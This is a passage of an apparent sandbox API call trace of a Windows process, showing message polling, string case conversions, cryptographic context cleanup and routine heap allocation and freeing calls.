PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0162.688] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0162.688] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.688] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0162.688] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.688] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0162.688] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0162.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.688] CryptDestroyKey (hKey=0xaa55e0) returned 1 [0162.688] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0162.688] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0162.688] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0162.688] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0162.689] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0162.689] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0162.689] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0162.689] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0162.689] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0162.689] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0162.689] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0162.689] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0162.689] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0162.689] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0162.689] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0162.689] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0162.689] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0162.689] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0162.689] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0162.689] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0162.689] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0162.690] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0162.690] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0162.690] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.690] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0162.690] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.690] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0162.690] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.690] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.690] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0162.690] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.690] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0162.690] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.690] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.690] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.690] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.690] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0162.691] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0162.691] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0162.691] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0162.691] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0162.691] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.691] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.691] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.691] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.691] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.691] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.691] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0162.691] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.691] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0162.691] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.691] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.691] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.692] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0162.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0162.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0162.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0162.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0162.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0162.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0162.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0162.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0162.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0162.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0162.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0162.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0162.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0162.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0162.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0162.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0162.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0162.694] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0162.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0162.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0162.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0162.694] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0162.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0162.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0162.695] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0162.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0162.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0162.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0162.695] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0162.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0162.695] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0162.696] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0162.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0162.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0162.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.696] FreeLibrary (hLibModule=0x74d40000) returned 1 [0162.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0162.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0162.697] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0162.697] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0162.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0162.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0162.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0162.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0162.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0162.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0162.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0162.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0162.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0162.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0162.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0162.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.698] CloseHandle (hObject=0x1e8) returned 1 [0162.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0162.699] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 